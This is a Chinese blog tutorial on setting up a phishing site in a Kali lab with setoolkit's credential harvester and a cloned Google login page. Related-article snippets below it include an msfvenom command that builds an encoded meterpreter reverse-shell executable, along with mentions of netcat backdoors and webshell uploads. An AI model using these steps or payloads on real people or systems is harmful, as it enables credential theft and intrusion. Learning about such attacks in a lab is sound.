制作一个简单的钓鱼网站

摘要:
制作一个简单的钓鱼网站实验环境:一台kali虚拟机,NAT模式上网。一台物理机首先在kali上打开要使用的工具setoolkit.接着有6个选项,选择第一个社会工程攻击.选择社会工程攻击之后接着有11个选项.选择第二个网站攻击向量.选择完之后有8个选项。第一个选项是使用kali自带的网站模板。第三个方法是允许自已导入网站。这样就大功告成,等着别人来访问那个钓鱼网站。再回到kali这边,就可以看到我们刚刚登录使用的账号密码。

制作一个简单的钓鱼网站

实验环境:一台kali虚拟机(用作制作钓鱼网站),NAT模式上网。
一台物理机(就是我的电脑,用作被攻击对象)

首先在kali上打开要使用的工具setoolkit.
制作一个简单的钓鱼网站第1张

接着有6个选项,选择第一个社会工程攻击.
选择社会工程攻击之后接着有11个选项.
制作一个简单的钓鱼网站第2张

选择第二个网站攻击向量.
选择完之后有8个选项。
制作一个简单的钓鱼网站第3张

选择第三个凭证收割攻击方法.
选择完之后有3个选项。
制作一个简单的钓鱼网站第4张
第一个选项是使用kali自带的网站模板。
第二个选项是选择一个网站进行克隆。
第三个方法是允许自已导入网站。

这里我们选择第1个,使用网站模板。
制作一个简单的钓鱼网站第5张
接着默认回车就行,默认使用kali的IP地址,即网站接收到的数据都返回到这个IP。

制作一个简单的钓鱼网站第6张
然后就是选择我们要使用的网站模板,这里用第二个Google试一下。

制作一个简单的钓鱼网站第7张
这里的提示默认就行,然后回车。

制作一个简单的钓鱼网站第8张
这样就大功告成,等着别人来访问那个钓鱼网站。
接着我去物理机上进行登录(IP为kali的IP)。

制作一个简单的钓鱼网站第9张

再回到kali这边,就可以看到我们刚刚登录使用的账号密码。
制作一个简单的钓鱼网站第10张

免责声明:文章转载自《制作一个简单的钓鱼网站》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇工具篇01-代码扫描工具GammaLinux内核数据结构映射-idr(转)下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

《网络对抗技术》Exp2 后门原理与实践

Exp2 后门原理与实践 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头...

ubuntu,kali linux和windows三系统流水账——写给自己

我先说一下ubuntu和windows双系统安装的几种方法,最后总结kali linux的安装,想起什么写什么,所以有点乱。然后记录一下自己的使用过程中遇见的问题和解决的方法,还有我的个人建议。 我个人安装的是目前最新的ubuntu16.04LTS。windows是10.kali linux是2.0。 首先比较一下虚拟机和双系统,我以前一直用的是虚拟机,因...

kali之msfconsole

1.启动msfconsole命令模式2.msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe3.启动msfconsole命令模式 use exploit/mult...

Kali Linux 2020.3 修改系统语言

一.背景信息在安装完 kali linux 2020.1 时,其操作系统默认语言为英文的,我们操作起来比较麻烦,为了以后操作方便起见,这边将其操作系统默认语言更改为中文。本篇文章将带领各位小伙伴们一起去将操作系统默认语言更改为中文 二.操作步骤打开Terminal Emulator 界面,查看当前系统语言为默认英文 在Terminal Emulator...

kali系统网站部署笔记

网站放在 其他位置----计算机------var-----www----html 首先启动nginx service nginx start   然后访问127.0.0.1 就会看到Apache正在工作 启动mysql数据库 service mysql start 接着用 mysql -u root -p 连接mysql 用户名:root 密码:1234...

Kali学习笔记38:文件上传漏洞

早些年,提到Web渗透,或者搜索一些黑客教程 基本都会看到文件上传漏洞。 它是一个很经典的漏洞 但它本质其实不是一个漏洞,而是网站本身的上传文件功能 不过如果我们上传了Webshell,那么就成为了文件上传漏洞 打开我们的靶机Metasploitable: 这里就是我们可以测试文件上传的地方 我们先在低安全级别的情况下测试 首先我们上传一个正常的图片文件...